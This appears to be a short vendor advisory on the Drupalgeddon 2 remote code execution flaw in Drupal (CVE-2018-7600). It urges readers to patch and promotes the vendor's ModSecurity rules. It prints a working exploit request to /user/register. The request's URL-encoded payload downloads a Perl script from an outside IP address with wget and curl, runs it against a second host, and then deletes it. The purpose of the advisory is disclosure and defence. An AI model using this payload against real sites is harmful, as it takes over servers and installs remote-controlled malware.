Drupal – Remote Code Execution (SA-CORE-2018-002 / CVE-2018-7600) nicknamed Drupalgeddon 2

Drupal

This vulnerability discovered Drupal security team two weeks ago, a highly critical (25/25 NIST rank), (SA-CORE-2018-002 / CVE-2018-7600) nicknamed Drupalgeddon 2. This vulnerability allowed an unauthenticated attacker to perform remote code execution.

An exploitation method was published a few days ago for this vulnerability which allows attacker in the server execute any code with user permission.

Example request

The vulnerability is very easy to exploit, all the attacker needs to do is send a request with payload to:

--56f4611e-B--
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1

Post Payload

--56f4611e-C--
mail%5B%23markup%5D=cd+%2Fvar%2Ftmp%2F+%3B+cd+%2Ftmp%2F+%3Bwget+http%3A%2F%2F195.22.126.16%2F2sm.txt%3B+lwp-download+http%3A%2F%2F195.22.126.16%2F2sm.txt%3B+fetch+http%3A%2F%2F195.22.126.16%2F2sm.txt+%3B+curl+-O+http%3A%2F%2F195.22.126.16%2F2sm.txt%3B+perl+2sm.txt+195.22.127.225%3B+rm+-rf+2sm.txt&mail%5B%23type%5D=markup&form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec

Final words

If you have not already, update as soon as possible your drupal installation!

Websites that using Malware Expert – ModSecurity rules are protected against this attack.